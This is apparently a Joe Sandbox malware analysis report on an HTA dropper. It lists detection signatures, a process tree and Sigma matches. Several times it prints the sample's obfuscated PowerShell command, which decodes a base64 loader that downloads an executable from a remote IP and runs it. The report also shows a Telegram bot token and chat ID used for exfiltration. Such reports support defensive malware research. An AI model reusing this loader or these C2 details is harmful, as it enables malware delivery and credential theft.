Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
niceworkingskilldevelopedwithgreatnews.hta

Overview

General Information

Sample name:niceworkingskilldevelopedwithgreatnews.hta
Analysis ID:1634283
MD5:dbaa05b3c52b9b9199d48e9c3ec4b3e2
SHA1:1cde3a1736d2b71ab0e27c0dd0fc6c9ae3bdac55
SHA256:5e18bfde60f96b7ea7de2182379c6c50ff90c0dcb67872498526c02b25363387
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7060 cmdline: mshta.exe "C:\Users\user\Desktop\niceworkingskilldevelopedwithgreatnews.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6072 cmdline: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1956 cmdline: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 5200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 1072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • vcc.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Roaming\vcc.exe" MD5: 882396942BDED48550AD6CDDEB511480)
          • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\8161.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\29106.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • daphpvwO.pif (PID: 3320 cmdline: C:\\Users\\user\\Links\daphpvwO.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
{"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 37 entries
            SourceRuleDescriptionAuthorStrings
            11.2.daphpvwO.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            11.2.daphpvwO.pif.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            11.2.daphpvwO.pif.438038.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            11.2.daphpvwO.pif.29240ee8.4.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              11.2.daphpvwO.pif.29240ee8.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 118 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_1956.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\vcc.exe, ProcessId: 3616, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgI
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", ProcessId: 5200, ProcessName: csc.exe
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\daphpvwO.pif, NewProcessName: C:\Users\user\Links\daphpvwO.pif, OriginalFileName: C:\Users\user\Links\daphpvwO.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\vcc.exe" , ParentImage: C:\Users\user\AppData\Roaming\vcc.exe, ParentProcessId: 3616, ParentProcessName: vcc.exe, ProcessCommandLine: C:\\Users\\user\\Links\daphpvwO.pif, ProcessId: 3320, ProcessName: daphpvwO.pif
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1956, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1956, TargetFilename: C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

                  Data Obfuscation

                  barindex
